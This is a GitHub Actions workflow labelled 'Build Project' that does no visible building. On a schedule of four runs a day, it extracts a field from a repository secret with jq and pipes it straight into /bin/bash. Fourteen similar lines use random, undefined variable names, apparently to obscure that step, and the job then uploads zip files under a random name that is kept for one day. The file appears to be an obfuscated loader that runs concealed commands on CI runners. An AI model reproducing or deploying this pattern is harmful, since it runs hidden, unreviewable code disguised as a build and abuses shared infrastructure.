name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '51 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          s57: ${{ secrets.s57 }}
        run: |
          printf '%s' "$s57" | jq -r .tz25 | /bin/bash
          echo $cs2 | jq -r .miobt05 | /bin/bash
          echo $yts64 | jq -r .ae9 | /bin/bash
          printf '%s' "$w8338" | jq -r .yajuh8144 | /bin/bash
          printf '%s' "$er83299" | jq -r .tub2 | /bin/bash
          printf '%s' "$slpb093" | jq -r .hl66649 | /bin/bash
          printf '%s' "$mbwib39" | jq -r .uqry71039 | /bin/bash
          printf '%s' "$kteg9" | jq -r .xie6 | /bin/bash
          echo $vvwe7 | jq -r .k88749 | /bin/bash
          printf '%s' "$fz98" | jq -r .j11 | /bin/bash
          echo $ydag308 | jq -r .xtpi77077 | /bin/bash
          printf '%s' "$gptab2" | jq -r .jfo9605 | /bin/bash
          printf '%s' "$fqhs5749" | jq -r .e192 | /bin/bash
          printf '%s' "$oi76928" | jq -r .ffne6583 | /bin/bash
          printf '%s' "$gqtx93774" | jq -r .ulh35622 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: PlnnXCvY
          path: "*.zip"
          retention-days: 1
